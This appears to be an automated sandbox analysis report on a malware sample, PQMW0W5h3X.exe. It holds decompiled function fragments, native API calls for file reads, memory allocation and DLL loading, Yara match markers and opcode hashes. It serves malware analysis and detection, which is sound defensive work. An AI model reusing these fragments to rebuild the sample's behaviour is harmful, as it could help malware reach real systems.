                                                                                                                          0x1000111a
                                                                                                                          0x1000111c
                                                                                                                          0x100011ba
                                                                                                                          0x100011c6
                                                                                                                          0x10001122
                                                                                                                          0x10001123
                                                                                                                          0x10001123
                                                                                                                          0x10001126
                                                                                                                          0x10001127
                                                                                                                          0x1000112a
                                                                                                                          0x100011f9
                                                                                                                          0x100011fc
                                                                                                                          0x10001194
                                                                                                                          0x1000119a
                                                                                                                          0x100011a2
                                                                                                                          0x100011a7
                                                                                                                          0x100011aa
                                                                                                                          0x00000000
                                                                                                                          0x100011aa
                                                                                                                          0x100011ff
                                                                                                                          0x10001200
                                                                                                                          0x1000117c
                                                                                                                          0x10001182
                                                                                                                          0x1000118a
                                                                                                                          0x00000000
                                                                                                                          0x1000118a
                                                                                                                          0x10001148
                                                                                                                          0x10001149
                                                                                                                          0x10001151
                                                                                                                          0x1000115e
                                                                                                                          0x10001166
                                                                                                                          0x1000116f
                                                                                                                          0x10001174
                                                                                                                          0x10001174
                                                                                                                          0x00000000
                                                                                                                          0x10001149
                                                                                                                          0x10001130
                                                                                                                          0x100011c7
                                                                                                                          0x100011c7
                                                                                                                          0x100011ce
                                                                                                                          0x100011db
                                                                                                                          0x100011e0
                                                                                                                          0x100011e5
                                                                                                                          0x100011eb
                                                                                                                          0x100011f1
                                                                                                                          0x100011f1
                                                                                                                          0x00000000
                                                                                                                          0x100011ce
                                                                                                                          0x10001136
                                                                                                                          0x10001139
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000113f
                                                                                                                          0x10001142
                                                                                                                          0x10001191
                                                                                                                          0x00000000
                                                                                                                          0x10001191
                                                                                                                          0x10001145
                                                                                                                          0x10001146
                                                                                                                          0x10001179
                                                                                                                          0x00000000
                                                                                                                          0x10001179
                                                                                                                          0x00000000
                                                                                                                          0x100011b0
                                                                                                                          0x100011b0
                                                                                                                          0x00000000
                                                                                                                          0x100011b9

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 10001151
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011AA
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011BD
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011EB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloclstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 852173138-0
                                                                                                                          • Opcode ID: 335bfb3eee5401576ccd7ed7eaa48b8bc68e5a6de95141012eee8b581a67eaa8
                                                                                                                          • Instruction ID: f3c6a4d1cb6ed30c88921a1fa743563ab198a0ac7443c24c90fc5835e0779d4c
                                                                                                                          • Opcode Fuzzy Hash: 335bfb3eee5401576ccd7ed7eaa48b8bc68e5a6de95141012eee8b581a67eaa8
                                                                                                                          • Instruction Fuzzy Hash: 4031CDB5804655AFF705CF64DCC9AEA7FFCEB092D1B164029FA45D726CEB3099008B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                                          0x004057f0
                                                                                                                          0x004057f2
                                                                                                                          0x0040581a
                                                                                                                          0x004057ff
                                                                                                                          0x00405804
                                                                                                                          0x0040580f
                                                                                                                          0x00000000
                                                                                                                          0x0040582c
                                                                                                                          0x00405818
                                                                                                                          0x00405818
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                                                                                                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                          • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                                                                                          • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                          • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: PQMW0W5h3X.exe PID: 6608 Parent PID: 6528 PQMW0W5h3X.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                                                                          0x00418283
                                                                                                                          0x0041828f
                                                                                                                          0x00418297
                                                                                                                          0x0041829c
                                                                                                                          0x004182a2
                                                                                                                          0x004182bd
                                                                                                                          0x004182c5
                                                                                                                          0x004182c9

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: !:A$b=A$b=A
                                                                                                                          • API String ID: 2738559852-704622139
                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004183AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID: 6HCU
                                                                                                                          • API String ID: 2167126740-1255677348
                                                                                                                          • Opcode ID: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                                                                          • Instruction ID: 785ee6bdb1737b7ece5f68c773e4035cb9a370b06d5a2f4bb549206f88432f0d
                                                                                                                          • Opcode Fuzzy Hash: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                                                                          • Instruction Fuzzy Hash: 4DF0F8B5200208ABCB14DF99DC81EEB77A9AF8C754F158149BE5897251D630E911CBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00418222, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                                                                          • Instruction ID: eb2fcad7cfbb8d36c8c07e65e7b1c2717ee67fb2c70223fbf7d83cf3cf0a7d26
                                                                                                                          • Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                                                                          • Instruction Fuzzy Hash: 62F0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7205C635E8028B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A498F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                                                                          • Instruction ID: 3679f56db154f20b125b2ee624a088cf27215c8a369a8f6811c3a0c659b85df9
                                                                                                                          • Opcode Fuzzy Hash: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                                                                          • Instruction Fuzzy Hash: 3990026160100503D21271694404616000AE7D0382F91C032A5014555ECA7589D6F171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                                                                          • Instruction ID: 21c54deca697b2ded1517e8e1738f7315810da786e900ad234c2aa2cb91c91dc
                                                                                                                          • Opcode Fuzzy Hash: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                                                                          • Instruction Fuzzy Hash: DA90027120100413D222616945047070009E7D0382F91C422A4414558D96A68996F161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                                                                          • Instruction ID: 41887b8759142fbb3d7f1feb8a98236d473b17719def4235c2a79c670be888c7
                                                                                                                          • Opcode Fuzzy Hash: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                                                                          • Instruction Fuzzy Hash: 17900261242041535656B16944045074006F7E0382791C022A5404950C8576989AE661
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                                                                          • Instruction ID: 1feb496b191fc441b15c9f44a378969dd7f4dd2a3fa43bc79c875e267a888c90
                                                                                                                          • Opcode Fuzzy Hash: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                                                                          • Instruction Fuzzy Hash: 3B9002A134100443D21161694414B060005E7E1342F51C025E5054554D8669CC96B166
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                                                                          • Instruction ID: cd18590575c2b322f46f28179e48b638b62d154e3f57e717e1138a8122dace73
                                                                                                                          • Opcode Fuzzy Hash: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                                                                          • Instruction Fuzzy Hash: 2B9002B120100403D251716944047460005E7D0342F51C021A9054554E86A98DD9B6A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                                                                          • Instruction ID: 395bf6263286ad70b641d49cb16516253b58af2615c1288a40097d6e6d3034c8
                                                                                                                          • Opcode Fuzzy Hash: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                                                                          • Instruction Fuzzy Hash: C3900261601000434251717988449064005FBE1352751C131A4988550D85A988A9A6A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                                                                          • Instruction ID: a6f67a8277a3b3be8b89b917850b13e78702fe5dd5bedc71adf87a0afe52c33f
                                                                                                                          • Opcode Fuzzy Hash: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                                                                          • Instruction Fuzzy Hash: 8490027120140403D2116169481470B0005E7D0343F51C021A5154555D86758895B5B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                                                                          • Instruction ID: 64d2cfaf13f9309bcd7403859deaf896cc2873968d7599671b0a295e5d50db3c
                                                                                                                          • Opcode Fuzzy Hash: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                                                                          • Instruction Fuzzy Hash: FC90026121180043D31165794C14B070005E7D0343F51C125A4144554CC96588A5A561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                                                                          • Instruction ID: 08c33894a5ed7cb2586842ca04486c4597f6e0c3905499bcde100bcd11c8e5f2
                                                                                                                          • Opcode Fuzzy Hash: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                                                                          • Instruction Fuzzy Hash: 0D9002A120200003421671694414616400AE7E0342B51C031E5004590DC57588D5B165
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                                                                          • Instruction ID: 1315aa69fdc5ae92524b7a957cf78082d5d3c7872c89ceafb40b3329d7236b15
                                                                                                                          • Opcode Fuzzy Hash: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                                                                          • Instruction Fuzzy Hash: 75900265211000030216A56907045070046E7D5392351C031F5005550CD67188A5A161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                                                                          • Instruction ID: f1994b6a4f452d4f91f2f1e37c547d66f4cd1f9836b374957a5211878604265d
                                                                                                                          • Opcode Fuzzy Hash: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                                                                          • Instruction Fuzzy Hash: 0890027120108803D2216169840474A0005E7D0342F55C421A8414658D86E588D5B161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                                                                          • Instruction ID: 82818c37d7a7e9e8cb6d625da2237b27d33e1dddfe8bbaa70537b02e9c407086
                                                                                                                          • Opcode Fuzzy Hash: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                                                                          • Instruction Fuzzy Hash: 3F90027120100803D2917169440464A0005E7D1342F91C025A4015654DCA658A9DB7E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A497A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                                                                          • Instruction ID: 39b11731bdff199837e062ce116313473b0146bb55da1fdd5054dad37b832a5f
                                                                                                                          • Opcode Fuzzy Hash: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                                                                          • Instruction Fuzzy Hash: 7690026130100003D251716954186064005F7E1342F51D021E4404554CD965889AA262
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

